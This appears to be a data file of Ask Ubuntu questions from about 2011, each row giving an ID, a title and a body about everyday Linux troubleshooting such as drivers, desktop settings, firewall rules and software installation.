89831	are the following programs working in playonlinux ?	i have windows 7 and i want to install ubuntu because it is very useful and i have no worries about viruses . i want to ask you , as ubuntu users , if the following programs will work fine if i use playonlinux software : visual studio 2010 ( i need it for university , i use for c # programming and asp.net with mvc 3 , too ) microsoft office 2007/2010 ( i saw here and youtube that will works fine ) coreldraw x5 yahoomessenger 11
89832	how do i get a broadcom 4313 wireless card working on a 2.6.38 kernel ?	originally using ubuntu 11.10 64-bit ( kernel 3.0.0-14-generic ) . as there are heating issues with the kernels , i installed kernel 2.6.38.10-kernel also . when i boot using 2.6 kernel , the wifi doesnt work , but in 3.0 it does . i 'm a beginner at ubuntu so please be precise .
89835	mouse cursor spinning forever after startup	after startup , the mouse cursor keeps spinning ... this does n't happen every time but at 50 % of times . after a relog it works as espected . this is very annoying . how can i fix this ? anyone else having this issue ? please i do n't want to login twice every time . ps . autologin is active
89840	why i can not browsing the internet using normal connection but when i using tor network it work ?	why i ca n't using my normal connection but when i using tor network it working ? i 'm using mobile broadband ( ppp ) . i tried to use terminal and try to ping www.google.com but the result : mrahimi @ cq40 : ~ $ ping www.google.com ping : unknown host www.google.com does my isp banned me or something else ? i have disable my ufw firewall but still the same.. i using this command in terminal : cat /etc/resolv.conf the result : # generated by networkmanager i had tried using the network proxy ( using chrome ) and the internet work normally but when i using the normal connections it turn the same again ( no connections ) ? why does it mean i had been banned by my isp ?
89842	is it possible to re-arrange the search providers on the gnome shell activities overview display ?	i have added additional search providers ( e.g. , askubuntu , wolfram , youtube ) in the /usr/share/gnome-shell/search_providers directory . these work great . however , the order in which they appear on the activities overview is not logical . is it possible to change the order in which search providers are displayed ? bonus : how do i make one the default ?
89844	shutdown and reboot is causing logout , and brings me to login page	while i am trying to reboot or shutdown my system using the menu , i am again routed to login page . from the login page i am not able to shutdown or reboot the system , only thing i can do is to login .
89852	why is n't my swap cleared after usage ?	when i use a lot of ram ( 90-100 % ) then the laptop normally starts using swap so if i look in htop during that intense usage i see it 's using 200mb of swap . but when i stop using the laptop ( the computer is idle and running ) the swap is still used , it 's not cleared as the ram is . why is that ? system : ubuntu 11.04 64-bit laptop : asus 1201n 2gib ram , 2gib swap , 1.6 ghz dual core cpu .
89853	proprietry or open source drivers whats best ?	i would like to know please , what 's the best driver : open source or manufacturer ? and what 's the difference between the two ? i am having trouble with my atd hd6470 in 11.10 , and my system will not boot after i installed the proprietary drivers . are there open source ones to fix the problem ?
89862	when a ppa has a package of the same name in the ubuntu software center	if a ppa in your sources list has a package of the same name in the ubuntu software center , which one shows up in the software center . likewise , which package is downloaded via apt-get install ?
89868	tighten items in gnome shell panel ?	am really liking what you can do with gnome shell . the extensions are very nice and there 's some very good ones that available . is there an easy way to tighten up the items on the panel ... below is what 's on my screen right now ...
89871	is there a way to upload folders instead of files to ubuntu one ?	i was wondering if there was a way to upload entire folders instead of files when using browsers on ubuntu one ? this would be really useful .
89873	why ca n't i change my icon theme in gnome-classic ?	i 'm running ubuntu 11.10 ( updated ) and gnome-classic ( i missed it :3 ) i 've tried setting my icon theme , gtk theme , and window theme in gnome-tweak-tool , as well as ubuntu tweak , gconf-editor , and dconf-editor . even though it shows my selections are selected , the icons and themes stay the same . any help would be greatly appreciated ! update : i 've tested things out on gnome-shell and unity , and i have full control over icons and such in those environments , but still no control in gnome-classic . i would really like to figure this out . update 2 : it seems that after uninstalling unity that i have full control over everything . any explanation ( since unity or some part of it seemed to be the cause ) would be really nice .
89874	how to open .mrc files	i 've just downloaded some .mrc files . but i could n't find the right application to open it . i 'm using ubuntu 11.10 what application should i have to open them ?
89876	audio comes out of only one speaker on a macbook pro 7.1	model identifier : macbook pro 6,1 processor name : intel core i5 ubuntu 11.10 audio coming only out of one speaker audio settings menu : hardware tab : internal audio 1 output/1 input analogue stereo duplex output tab : connector - analogue headphones ( i have no other options available , analog speaker option missing ) used to work , but ubuntu broke , again , so had to do a fresh install . now audio only works as mono , and i can not change output type . any suggestions ? tried another fresh install , i can still only select headphones as the output . playback is only out of one speaker , mono . it looks like ubuntu has decided to no longer see my internal speaker , only headphone output .
89877	xubuntu still booting to unity	i installed xubuntu according to the accepted answer in this question ; how do i switch to xubuntu ? now i get xububtu startup and shutdown screens , but i still end up with unity once it 's booted . i did n't get prompted to choose between lightdm and gdm and i do n't seem to be getting the lightdm login screen . any tips ?
89881	gnome 3 problem with hplip toolbox in system tray	i get an error message from hplip that no system tray was found . is there a workaround for this ?
89891	panel encountered a problem while loading `` clock applet factory : : clockapplet	i am facing the error in above snapshot frequently on my system . what is a solution for this all my tool bar and related icons disappear after this in panel .
89893	how to copy my software to another computer ?	i have installed ubuntu in my laptop and i want to copy all the software and games that i have downloaded from software center to my desktop such that i do n't need to download them all over again . how do i do that ?
89895	which is the easiest way to reset the mysql root password ?	in the past there has been sudo /etc/init.d/mysql reset-password , ( 1 ) is manually restarting and setting the password with an sql command again required ? ( 2 ) ( 1 ) http : //www.ubuntugeek.com/reset-the-root-password-on-mysql.html ( 2 ) http : //www.howtoforge.com/reset-forgotten-mysql-root-password
89901	ubuntu 11.10 gnome 3 shell does n't have the activities menu or launcher	i installed it from apt-get and it only has applications and places instead of the activities menu , it also does n't have the dock or launcher . using the super key does nothing , as neither does mousing to the upper left corner . i have also installed the tweak tool , but it looks like all the settings are not being applied to the ui . am i missing something . i have never used gnome 3 before as i recently upgraded from ubuntu 10.4 , which i believe was gnome 2 for the shell . i have been reading the documentation on the gnome site and it says there should be an activity menu and other items that are n't there . thanks
89906	how to reformat a drive with ntfs ?	i currently have a corrupted ntfs external drive that i want to re-format in a format that can be read by linux and windows - suggestions ? i want to reformat my 1tb ntfs drive to a format that can be read by linux and windows but wo n't cause freezing issues when copying files to and from it on ubuntu . i found a format that i want to format the drive in called ext2 but how would i go about doing so ?
89919	how do i get microsoft lifecam nx-6000 video to work ?	i 'm running ubuntu 10.10 32-bit . kernel v2.6.35-30generic . skype v2.2.0.35-0maverick1 . after connecting the microsoft lifecam nx-6000 webcam , the microphone works fine , but the video refuses to work on skype , even though skype recognises the webcam . on cheese , it does not even recognise the webcam , and reports `` no device found '' . i have tried both 32-bit solutions on this page : http : //community.linuxmint.com/tutorial/view/219 . initially , the light on the webcam only blinked once after plugging in and then remained off . however , after the above fix , the light remains on , though the video does not work . how do i get this to work ? are there any outputs that i need to provide ?
89928	error message installing from flash drive	i am trying to install ubuntu 11.04 from a bootable flash drive . when got window of the starting install ubuntu , after a while i get an error message : mount : mounting/dev/loop0 on//filesystem.squashfs failed : ... ubuntu : : error - mounting /dev/loop0 on //filesystem.squashfs failed ... can not mount /dev/loop0 ( /cdrom/casper/filesystem.squashfs ) on //filesystem . i ca n't install my ubuntu 11.04 in my pc yet for that problem . i spent a more time and did n't find any suggestion from internet .
89931	web spider for ubuntu	i 'm looking for a web spider for ubuntu like this one webripper - calluna software . you can download a whole site like you can with wget -r -m example.com but the feature i 'm looking for is you can input a search term like `` linux '' and it searches the web and downloads them . are there any programs on ubuntu like this ?
89932	flash not working in firefox	i have installed ubuntu 11.10 in my system with gnome shell . when i try to watch any videos on any video streaming website in firefox , i am not able to watch . at the same time those videos can be played in chromium browser . i have already installed flash 11 and the flash plugin for firefox as well .
89939	lightweight linux distro ( preferably ubuntu based ) needed for ibm r51	i have an ibm r51 laptop which is about 8 years old . i have extended the ram to 1.4gb in total and have a 160gb hard disk . right now i 'm running ubuntu 11.10 and its slow on my laptop . also the mic is not working ( it was working on the previous versions ) . right now i just want a simple to use preferably gnome based and ubuntu based distro which will run fast on my laptop . i should be able to run libreoffice or openoffice and google chrome and firefox . thanks ...
89946	open application in specific workspace	i would like to have some applications always appear in a specific workspace . for example : i would like my mp3 player on the bottom left workspace , and terminal application on the bottom right one ; i am new to ubuntu , so tried using wmctrl but it looks to me as desktop wall works by creating one big desktop and then splitting it up into 4 pieces .
89949	how do i tether internet from my iphone ?	i 'm trying to usb tether internet from my iphone 4 and when i connect the phone , it will appear as a wired connection but my pc will never establish a connection with the phone . i 've recently installed ubuntu 11.10 but have yet to perform any updates . is there any configuration changes i need to make or install any third party apps to get this going ?
89951	kubuntu v/s xubuntu v/s ubuntu	note : before posting this , i looked at a similar thread , but could not find what i was looking for . i am using ubuntu at present . learnt about kubuntu & xubuntu recently . visited its websites to find out details . learnt that these are based on ubuntu . kubuntu uses kde graphical environment . xubuntu uses xfce graphical environment . my need : programming for database oriented business apps using mysql & python . use online stock-trading terminal based on java . should i go for ubuntu or xubuntu or kubuntu ? ( i read that xubuntu is faster than kubuntu ) . i am going to format my laptop . before that , i want to download a latest copy of a good open source os . can anyone please share on the following points : whether the default xubuntu / kubuntu installation is packed with open source software packages such as mysql , python , etc . or i need to download those separately ? compared to ubuntu , whether xubuntu / kubuntu have the 'software centre ' which can take care of new / old installation of packages . no setting-up of wireless internet was required in my existing ubuntu . it was automatically detected & taken care of by the os . what about xubuntu / kubuntu ? performance point of view , how do they compare ? e.g . my ubuntu os starts within 10 sec & shuts down in 3 secs any other plus or minus points of xubuntu/kubuntu over ubuntu . thanks in advance , vineet
89952	unable to boot 11.10 due to graphic driver problem with ati radeon hd6470m o amd a8 quad core	i bought a new laptop with amd a8 quadcore processor . it has duel graphics with an on board ati radeon hd6470m card and h6620g after a lot of effort i managed to install 11.10 by using f6 nomodeset . however installed ubuntu wont boot just going to black screen . these are the actions i have tried so far . taking out quietsplash , i tried nomodeset in my grub but only got to battery line.. have tried both 11.10 64bit and 32 bit on this samsung machine but have this boot issue after installation ( 11.10 32b currently installed ) . i could use a 10.04 cd which i have or download a another version if someone thinks it will work ? other things tried nomodeset xforcevesa and xforcevesa just gives purple screen followed by purple screen with 20 % white virticle lines at top then goes to nothing only black screen and freeze . i ran try cd with nomodeset now after lspci | grep vga we have . 00:01.0 vga compatable controller : ati technologies inc device 9641 then ... 02:00.0 vga compatable controller : ati technologies inc ni seymour [ amd radeon h d 6470m ] . this is a brand new samsung 305v5a-s02 notebook which doesnt allow me to remove the extra graphics card . if i try to run sudo apt-get install fglrx -installer ... ... it tells me unable to locate fglrx -installer i ran startx and it tells me failed to load fgirx ( module does not exist,0 ) i cant download the driver using wget so i downloaded the linux driver for my card from ati.com and put it onto a flash drive that i have formatted to fat but cant seem to work out how to load it into ubuntu now as i thought that if i can manually install the driver maybe that would be a fix.. someone told me that i cant use the ati driver telling me that `` your graphics card is not listed as supported here : wiki.cchtml.com/index.php/hardware `` however i have seen questions where people have resolved the issue with the same card see how to install driver for amd radeon hd6470m . i hear about open source too but i am not clear what and how that affects me. ? i have a lot more info for what i have tried if someone is able to help and needs further info . i believe that if ati site gives me that linux driver for my card then it should be possible to fix ubuntu . can someone explain how it works please and if i must accept that my laptop will only run in w7 or if there is a solution . would it worth trying another os like mint etc if not ? thanks oh can someone tell me who to close previous questions as this one now is going to be the main one for now . no resolved see installation of driver
89956	network manager do n't save wireless key	i reset my network manager and know , it ca n't remember wifi security key . each time i wan na connect to wifi , it ask me the security key . where is it problem and how to solve it ?
89958	missing indicator/notification icons for some applications in ubuntu 11.04 classic ?	i am using 11.04 with ubuntu classic ( no effects ) session . i found that all the default applications have their indicator icons working fine . but for any other application , which i installed like pidgin , fusion-icon , checkgmail etc , no icon appears in the notification area . these applications are indeed running as i could check from terminal . i checked with default ubuntu session ( which uses unity ) & found that icons are present and working as expected . also note that this is fresh installation of 11.04 . i removed indicator-me and indicator-message . but icons ( for new applications ) do not appear even when they are installed . i want to use classic session as i am more comfortable with gnome 2 .
89963	visual keyboard on lockscreen	recently , every time i 'm on the lockscreen , the visual keayboard appears at the bottom of the screen . how do i get it to disappear , and not appear again ?
89971	which java versions support global appmenu	yesterday after few updates ( some of them in java ) the eclipse lose ability to move it 's menu to the global-menu bar . i was try to remove/add different java from the ubuntu 's repositories but it still not showing in the global-menu . so my question is , what versions of java ( including the sun 's ) supports globalmenu , i do n't care what are licenses and other like that . just i want global 's menu back ; ) thanks .
89973	is there a way to use ubuntu one for synchronizing thunderbird on 2 computers ?	actually , i do n't find a way to synchronize thunderbird on 2 computers . it is really sad but there is no easy way to manage it ... no add-ons or sync options such as on firefox . i was wondering if it could be possible to use ubuntu one for this . i thank you all in advance for your help . regards
89976	how to change the default locale in ubuntu 10.10 server	i have a remote server which i installed and have been trying to unsuccessfully change the locale to french for a few hours . below are the contents of my locale files : //============ /etc/default/locale lang= '' fr_fr.utf-8 '' language= '' fr_fr.utf-8 '' lc_ctype= '' fr_fr.utf-8 '' lc_numeric= '' fr_fr.utf-8 '' lc_time= '' fr_fr.utf-8 '' lc_collate= '' fr_fr.utf-8 '' lc_monetary= '' fr_fr.utf-8 '' lc_messages= '' fr_fr.utf-8 '' lc_paper= '' fr_fr.utf-8 '' lc_name= '' fr_fr.utf-8 '' lc_address= '' fr_fr.utf-8 '' lc_telephone= '' fr_fr.utf-8 '' lc_measurement= '' fr_fr.utf-8 '' lc_identification= '' fr_fr.utf-8 '' lc_all= '' fr_fr.utf-8 //==================== /var/lib/locales/supported.d/local fr_fr.utf-8 utf-8 en_us.utf-8 utf-8 en_gb iso-8859-1 en_gb.utf-8 utf-8 en_gb.iso-8859-15 iso-8859-15 fr_be.utf-8 utf-8 fr_ca.utf-8 utf-8 fr_ch.utf-8 utf-8 fr_lu.utf-8 utf-8 fr_fr iso-8859-1 everything is still defaulting to english dates and the $ currency in my web app . is there something else i 'm overlooking ? i should also mention that i have dpkg re-configured and restarted the server after changes were made .
89978	what file system do i have installed ?	is there any way to check it from command line ?
89981	is there an application firewall for linux , like zonealarm	i 've tried firestarter and ufw , but in the end , decided to write my own iptables scripts . i basically let http and https , 53 , and if needed , the port for ppa key adding . ( if people want to chat online when using this machine , they can sign into their webmails or facebook ) . i was wondering though , is there a firewall that will allow me to block all applications from accessing the internet , and then let me whitelist the applications that i want to allow access to the internet ? ( this kind of like the zonealarm firewall for windows ) . ive heard about using the users and groups to block all people accessing the internet , and then assigning certain applications that can be used , but this seems very makeshift . there 's an android app called droidwall that apparently uses iptables to blacklist all apps from accessing the internet , and then allows you to whitelist the ones you want . any ideas , or perhaps iptables script examples ?
89985	error in node_crypto.cc when building node.js with nvm	the error message is the following ( tried with multiple versions of node v0.4.1 , v0.4.7 , etc ) : ../src/node_crypto.cc:101:29 : error : ‘sslv2_method’ was not declared in this scope ../src/node_crypto.cc:103:36 : error : ‘sslv2_server_method’ was not declared in this scope ../src/node_crypto.cc:105:36 : error : ‘sslv2_client_method’ was not declared in this scope waf : leaving directory `/home/gustavo/.nvm/src/node-v0.4.7/build' build failed : - > task failed ( err # 1 ) : { task : cxx node_crypto.cc - > node_crypto_4.o }
89987	how to install clang 3.0	i 'm around 3 days old in ubuntu and not aware of it 's basics . i am trying to install clang 3.0 on system . but i 've no idea what to do after getting the package . can any please help me in steps how to install the binaries ?
89988	is it possible to use an ubuntu live cd and run gparted to partition a my hdd ( including the partition that is usually mounted on a given system ) ?	i 'm encountering a problem with my hdd 's partitions and ca n't resize it . i 've described my problem and my system here : gparted 0.3 encounters problem with file system and wo n't resize partition . now , from a more general perspective , i was thinking on whether it is possible to use an ubuntu live cd and use gparted in a live session to possibly go around that problem . is that possible ? i made a separate question as i 'm interested in the possibility independently from my current problem . you see , i only have one partition and that 's mounted . when i use gparted through ubuntu i do n't get any error reports ( unlike the case reported in the question linked above ) . thanks beforehand .
89995	bash remove first and last characters from a string	i have a string like that : |abcdefg| and i want to get a new string called in someway ( like string2 ) with the original string without the two | at the start and at the end of it so that i will have this abcdefg is that possible in bash ?
89998	why '*.exe 's in python installation ?	just out of curiosity i executed following command and i was surprised to see ms windows executables in python installation directory . 20:36:46 nixlap [ ~ ] $ locate -i -r exe $ [ snipped ] /usr/lib/python2.6/dist-packages/setuptools/cli.exe /usr/lib/python2.6/dist-packages/setuptools/gui.exe /usr/lib/python2.7/dist-packages/setuptools/cli.exe /usr/lib/python2.7/dist-packages/setuptools/gui.exe /usr/lib/python2.7/distutils/command/wininst-6.0.exe /usr/lib/python2.7/distutils/command/wininst-7.1.exe /usr/lib/python2.7/distutils/command/wininst-8.0.exe /usr/lib/python2.7/distutils/command/wininst-9.0-amd64.exe /usr/lib/python2.7/distutils/command/wininst-9.0.exe /usr/lib/tomboy/tomboy.exe /usr/share/mono/monogetassemblyname.exe /usr/share/pyshared/setuptools/cli.exe /usr/share/pyshared/setuptools/gui.exe why do we need these '.exe ' on ubuntu installation ? particularly talking about the 'exe 's in pyhton package . i just do n't like the files ending in '.exe ' : p i can understand that banshee , tomboy , gbrainy use 'mono ' but why ca n't they just name it something other than '.exe '
90001	how can i activate bitmap fonts ?	i need to use pcf fonts but it seems that they are disabled now . i followed this thread without success . ( both 70-yes-bitmaps.conf and -bitmaps ) the fonts are visible with xfontsel but the app ca n't see/use them . any idea ? it used to work with ubuntu 10.10 but i installed 11.10 now so i suspect gnome 3 or unity because there is no problem with kde .
90005	quick-change of language environment	i 'm learning french , and one thing i would like to do is to quickly switch the entire interface between english and french without logging in/out . same idea as changing the keyboard layout , except changing the interface and browser language preferences . tl ; dr quick change between interface languages ?
90008	ubuntu one tomboy sync fails with `` the remote server returned an error : ( 404 ) not found . ''	i 'm trying to set up tomboy notes sync with ubuntu one . i 've followed the instructions in this guide . i get this successful authorization screen : and this is what my sync preferences screen looks like : when i click `` save '' in the sync preferences i get this success screen : but when i click `` yes '' i get this failure screen : i think this is the relevant error from my .xsession-errors file : [ error 09:38:25.560 ] caught exception . message : the remote server returned an error : ( 404 ) not found . [ error 09:38:25.561 ] stack trace for previous exception : at system.net.httpwebrequest.checkfinalstatus ( system.net.webasyncresult result ) [ 0x00000 ] in < filename unknown > :0 at system.net.httpwebrequest.setresponsedata ( system.net.webconnectiondata data ) [ 0x00000 ] in < filename unknown > :0 [ error 09:38:25.561 ] rest of stack trace for above exception : at system.environment.get_stacktrace ( ) at tomboy.websync.api.oauth.makewebrequest ( requestmethod method , system.string url , system.collections.generic.list`1 parameters , system.string postdata ) at tomboy.websync.api.oauth.webrequest ( requestmethod method , system.string url , system.string postdata ) at tomboy.websync.api.oauth.get ( system.string uri , idictionary`2 queryparameters ) at tomboy.websync.api.userinfo.getuser ( system.string useruri , iwebconnection connection ) at tomboy.websync.websyncserver.beginsynctransaction ( ) at tomboy.sync.syncmanager.synchronizationthread ( ) at system.threading.thread.startunsafe ( ) [ error 09:38:25.561 ] synchronization failed with the following exception : the remote server returned an error : ( 404 ) not found . at system.net.httpwebrequest.checkfinalstatus ( system.net.webasyncresult result ) [ 0x00000 ] in < filename unknown > :0 at system.net.httpwebrequest.setresponsedata ( system.net.webconnectiondata data ) [ 0x00000 ] in < filename unknown > :0 and the full output of tomboy -- debug is here .
90009	no startup sound in ubuntu 11.10	i installed ubuntu 11.10 4 days ago . when i login into my account the startup/login sound does not play . but when i logged in with a guest account , the sound plays . this is happening since i installed ubuntu 11.10 , i never heard the login sound when i log into my account . and by the way , this is a fresh install . please help .
90011	add more applications to the gufw drop down menu	i 'm setting rules for ufw using the gufw . in the preconfigured tab , there are applications which i can set to allow internet access . how can i add more applications to that list ?
90013	how do i enable syntax highlighting in nano ?	can nano do syntax highlighting like gedit and vim ? how can i enable it ? i need at least bash and python syntax highlights .
90015	how to copy files to all machines using puppet master ?	i have installed puppetmaster in ubuntu 11.04 and i have installed puppet in all my clients . i have joined all my puppet clients with puppet master . is it possible to copy a file to all these puppet clients from puppet master ? for example : i have the file named datas.xls in my desktop ( puppet master ) . how do i copy this files to all my puppet clients in the following location ( /home/operator1/desktop/backup/ ) ? update : hi still the file is not getting shared . how to modify this line puppet : ///modules/module_name/datas.xls the file to be copied is under this location /etc/puppet/modules/mymodule/manifests/datas.xls ? error on client : ( resolved ) root @ testing : ~ # puppetd -- test err : could not retrieve catalog from remote server : error 400 on server : could not find class sudo at /etc/puppet/manifests/site.pp:2 on node testing.chn.jd.com warning : not using cache on failed catalog err : could not retrieve catalog ; skipping run error 2 on client : root @ tme13 : ~ # puppetd -- test err : could not run puppet configuration client : could not retrieve local facts : bad uri ( is not uri ? ) : http : //169.254.169.254/2008-02-01/meta-data/ < html > < head > < title > http access denied < /title > < /head > < body > < img src/ new update : how to apply this module to all nodes ? such that the file will be copied to all nodes .
90017	i installed the openjdk-7 but my runtime environment was n't upgraded to 7 ?	i installed openjdk-7-jdk , `` javac '' was version 7 but `` java '' was still version 1.6 , any way around this ? no updates are available .
90024	how to use windows share has home directory	i 've got a windows 2k server , with ubuntu 11.10 desktops . i 'd like to implement something like roaming profiles . it can be `` local '' that 's synched to the server . i 've used likewise-open to get my windows logins working on my ubuntu machines , but to get the full benefit , something like roaming profiles would be good . any ideas/pointers ?
90027	how to sync songs in rhythmbox with an ipod	i can sync them with banshee but in rhythmbox ( am starting again to use it since it will be the default in 12.04 ) i can see that rhythmbox can detect the ipod and see the songs but when i try to drag one to the ipod how can i tell it to sync it so i can remove the ipod and listen to it .
90037	computer slows after copying a large amount of files	i copied my entire music , video and epub library from my external harddrive ( ntfs ) to a folder in my home directory ( ext4 ) it was a total of about 100 gigabytes . i noticed that over time , the copying rate slowed . when i did this in reverse prior to installing the new ubuntu , the rate slowed down to 3.7 mb per second . in both situations , after the copying finished , which took a few hours , all functions of the computer were laggy . windows lagged in loading up . menus lagged when clicking on them . the cpu graph in my indicator applet was extremely high . after reboot , it all returned to normal . is there some memory leak occurring when writing or reading the hard disk ? what 's going on here ?
90039	ios5 , banshee and memories gone	i am new to linux and while syncing my iphone 4 ios 5 with banshee , i have transferred 2 gbs of music and then i could not see any music in my iphone . i only realised shortly after that banshee currently does not support ios 5 . however somehow the 2gb of music have been transferred into my iphone , and i can not figure out a way to delete this wasted storage . my itunes says that 2gb of storage is being used under `` other '' cadoes anyone know how to track the music transferred into my iphone and delete the files ? thanks in advance . steven
90040	system booting into 11.10 installation after installing 10.04	i ca n't believe what happened . i had ubuntu 11.10 , i installed 10.04 a few days ago , i used it , everything was perfect . today i installed windows 7 , i opened ubuntu and it loaded 11.10 not 10.04 ! ! ! ! please help me , my all files might disappeared ! ! ! please ! ! ! : ( http : //pastebin.com/e5v7zvqx
90042	index second hard drive to search	well i just wan na find my files located on my second and third hard drive with ubuntu dash or synapse , because when i make a search with the both of it just show me results of the main hard drive and the most of my files are in the other drives . note : the others hard drives are ext4 too and mounted on /media/drivex thank you
90044	initramfs error during boot	i put the cd in and boot the machine . the initial ubuntu screen comes up ( `` ubuntu '' with the line of dots below it ) for a few seconds , and then it disappears and i see this text : initramfs , so that i could n't do further . please help to solve this problem thank you
90045	how do i investigate boot and partition issues ?	my machine wo n't boot , or wo n't choose the right operating system when i choose it in the grub menu , what information do i need to provide in my questions so people can help me ?
90047	pandora client with web interface ?	i am look for a pandora client that i can install on a headless ubuntu box i mainly use as a file server . it sits right next to my stereo system , and it would be nice if i could hook them together to listen to pandora ( which we right now with a laptop we plug in temporarily when we want to do it ) . are there any programs out there that could do this for me ?
90052	gpu hung when switching graphic card	i have a laptop ( dell inspiron n4110 ) with a switchable graphic . $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : ati technologies inc ni whistler [ amd radeon hd 6600m series ] ( rev ff ) normally , my laptop starts with both graphic cards enabled , which caused the laptop to turn very hot and the fan to become very noisy . i have been using a small script to disable the radeon card . for some time , i 'm quite happy with this arrangement . however , i have been having some issues with the intel card ( igd ) , the intel card often randomly hang when running opengl apps ; and so i want to give the radeon card ( dis ) another chance . i have never been able to switch to the radeon card , but recently , i found out that if i do a `` delayed switching '' ( ddis ) : # echo `` ddis '' > /sys/kernel/debug/vgaswitcheroo/switch root @ lieryan-dell-ubuntu : /sys/kernel/debug/vgaswitcheroo # cat switch 0 : igd : + : pwr:0000:00:02.0 1 : dis : : pwr:0000:01:00.0 then i logoff ( i.e . to restart x ) , the screen switch to pseudo-tty and then it stuck there freezing . at this situation , mouse and keyboard stops working so i ca n't switch to another ptty . i tried ssh-ing from another computer to salvage logs ( dmesg at that point ) and whatnot ; i found out that when freezing , the active graphic card is the amd card : -- this is from ssh -- # cat switch 0 : igd : : off:0000:00:02.0 1 : dis : + : pwr:0000:01:00.0 but the gpu is apparently hung , looking at dmesg gives : ... [ 1411.649974 ] vga_switcheroo : client 0 refused switch [ 1411.649985 ] vga_switcheroo : setting delayed switch to client 1 [ 1423.911759 ] vga_switcheroo : processing delayed switch to 1 [ 1424.006564 ] fbcon : remapping primary device , fb1 , to tty 1-63 [ 1424.006799 ] i915 : switched off [ 1424.840351 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 1425.718088 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 1426.622377 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 1427.355683 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 1428.193549 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id ... the invalid framebuffer id error is repeated for many times over ... i were able to successfully recover by switching back to the intel card and restarting x from ssh ; indicating that only the radeon card has problems switching . system info : $ uname -a linux lieryan-dell-ubuntu 3.0.0-14-generic # 23-ubuntu smp mon nov 21 20:28:43 utc 2011 x86_64 x86_64 x86_64 gnu/linux $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 11.10 release : 11.10 codename : oneiric the laptop also do not have the option to set graphic card at bios and the proprietary driver , fglrx , also have never worked ; when i installed it through jockey ( `` additional drivers '' ) , glxinfo showed that it still being rendered by mesa , the /sys/kernel/debug/vgaswitcheroo directory has gone missing , and the driver crashes with a traceback if i use xorg.conf to tell x to use fglrx . anyone had any idea if it is possible to use this amd card either with the radeon or the fglrx driver ? logs : dmesg
90053	resolution problem . help me ! please ( with video )	living in a resolution of a problem . i did n't know that i will describe how the video i added to the problem . i do not know what to do . -nvidia driver installed . -there was no problem before the new format . video link
90055	how do i troubleshoot a ssh : // link that wo n't do anything ?	i 've got a link ( in chrome ) that looks like in ubuntu 11 : ssh : //deploy @ ec2-snip.amazonaws.com when i click on it , nothing happens . i can ssh into the instance successfully . but when i click on this link , i get a dialog box for an `` external protocol request '' , then i click `` launch application '' and then nada . is there something i need to setup to get the ssh : // links to work in ubuntu ?
90057	how can i set up gufw so that only firefox connects to the internet	i only want http , https and dns to be open . i 'm having troubles with setting up port ranges in the ufw gui . how do i input configs into the feilds ? basically , something along the lines of this , but in gufw , as i 'm trying to convert my windows paranoid bro who hates the command line . iptables -i output -p tcp -- dport 80 -- sport 32768:61000 -j accept iptables -i output -p udp -- dport 53 -- sport 32768:61000 -j accept iptables -i output -p tcp -- dport 443 -- sport 32768:61000 -j accept iptables -a output -o lo -j accept iptables -i output -p icmp -j drop iptables -i input -p icmp -j drop iptables -i input -p udp -j drop iptables -i input -p tcp -m tcp -- syn -j drop iptables -i input -i lo -j accept iptables -i input -m state -- state established , related -j accept and there has to be a logging system easily accessible to see any supposed intrusions .
90058	audio cd ripper/encoder gui as good as grip ? ( eg . front end for cdparanoia and lame )	back in the day , there was grip . it had a complicated , somewhat ugly ui , but everything was configurable and , generally , it worked . then it was abandoned . now , there are all sorts of tools , but finding one that has reasonable configurability ( please let me provide the command line for lame ... that 's all i ask ! ) has been a multi-year frustration . i guess i understand the desire to keep things simple , but surely somebody else out there wants to use `` -- preset extreme '' . grip also had a neat system for handling special characters in track names ( ripped any sigur r贸s or m煤m albums ? ) that i 've not seen in other tools . here are the ones i 've tried : abcde — painful `` ui '' , irritating and tricky to deal with when cddb has no data , but it is configurable and overall it 's the best of the lot ( amazingly ) asunder — can not configure lame options , does n't act unix-y w.r.t . configuration options ( eg paths with leading slashes are n't considered absolute ) ripperx — more configurable , in that it allows `` extra '' options to lame , confusing ui , documentation way out of date sound-juicer — ubuntu docs warn people away due to some gstreamer problems rubyripper — tried this and hated it for reasons i ca n't recall now , and it 's not in the repositories anyway banshee — inadequate configuation options , wretched itunes-like ui ( i 'm probably a minority in that view ) , sluggish and bloated i have n't tried the kde tools . is my basic problem that i 'm living in the past here ? is there some awesome ripper/encoder in the repository that cleverly evades searches via synaptic ?
90059	view files from mirrored raid outside the device	the product i have is a western digital my book the device has stopped working but there is nothing wrong with either of the two mirrored drives . i would like to take out the two mirrored hard drives , and recover the data if at all possible . how would i go about this on ubuntu 11.10 ? both of the drives are recognized but i can not see the data anywhere . the relevant software i have on the system are : disk utility and a terminal application called mdadm . i am trying to be cautious and not accidentally wipe the data . any help will be much appreciated .
90066	how can i improve nautilusâ performance ?	i tried pcmanfm too , same thing . windows explorer on windows 7 can load the directory , thumbnails and all , in as little as 30 seconds or so . in nautilus , it 's constantly jostling around all the images and this goes on for about 20 minutes and finally it stops . scrolling through is terribly slow , too and silky smooth on windows 7 . i 'm using both operating systems on an ssd drive . how can i rectify this problem ?
90067	how do i get my wireless to automatically start after reboot	i am running ubuntu 11.10 , and finally have figured out how to get my broadcom bcm4306 wireless working . unfortunately , i still have to enter the following commands `` sudo modprobe -r b43 ssb '' and `` sudo modprobe b43 '' then enable networking and enable wireless every time after i reboot . does anyone know how to make this process happen automatically ? thanks for your help !
90068	is it possible to use an old computer that just has the possibility to use an usb interface wifi ?	i 'm using ubuntu 8.10 with on an old computer which is not very powerful , it has no wifi on the mother board . i would try to use an usb interface wifi and i 've seen many interfaces on the market but nobody have the explication if it is possible to use the hardware with linux . please , can you suggest me some hw or a way to resolve the problem ? i would like to connect the pc to internet . thank you very much .
90070	how does the shutdown button works without asking for password ?	if shutdown asks for password ( and so does every program which has the option to turn off after finishing something ) , how does the shutdown button work if it does not ask for it ?
90076	slow boot/login -- how do i figure out the cause ?	my boot and login are a lot slower than a fresh install . how do i trace the boot and login processes to figure out what programs are taking a long time to load ?
